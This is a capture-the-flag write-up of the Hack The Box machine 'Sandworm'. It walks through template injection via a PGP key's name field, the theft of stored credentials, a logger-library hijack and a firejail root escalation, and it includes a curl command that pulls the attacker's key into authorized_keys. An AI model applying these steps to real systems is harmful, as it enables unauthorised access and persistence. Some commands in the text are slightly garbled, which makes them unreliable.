Sandworm
https://app.hackthebox.com/machines/Sandworm
from hackthebox
Port scan
There was no intresting directories to further investigate.
Foothold
After further enumeration, the best page to further pwn was
/guide
here, we can verify the pgp signature with our public key.
now we create our own public key and signature to verify it here.
Finding web vuln
After we create our signature and public key, let's check it out on the website.
We can see that our name is echo(ed) out. Maybe a SSTI Vulnerability.
We have to manipulate the name parameter. Let's edit our key.
Exploitation
Enter the following command :
To select the uid: (Enter the number that is along with your key)
A
*
will appear once it's selectedCreating payload :
The blue line denotes the command, the yellow denotes the payload.
Create a signed message :
Export public key
SSTI
We can confirm that SSTI can be expoitated here.
Repeat the steps with your own payload
The one I used was :
And we got the shell
User shell
After a few while, I found an intresting file which had the password of the user.
~/.config/httpie/sessions/localhost_5000/admin.json
SSH with the creds
DONE
Privilage Escalation (2)
Source code of the running application
It's using a logger library, and fortunately we have access to write down into that library.
Path of the logger library :
Let's edit the library code
Wait for few minutes (less than 2 mintues) to get the shell.
Privilage Escalation (root)
We are going to use this script to get root
https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25
We can add our
ssh keys
into the remote machine for better shell experience.Create your own key with :
Copy the
~/.ssh/id_rsa.pub
into remote machine under/.ssh/
I used curl to download the file since vim was not working properly (maybe stablize shell and resume)
curl <your-ip>/id_rsa.pub ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
boom, we just need to ssh now and run the script, I used curl agian to copy the script from my local machine to the remote machine.
Run the
firejail --join=<id>
command as prompted into another ssh shell.now run
su -
orsu
for the root shell.
__________heapbyte's still pwning.
Last updated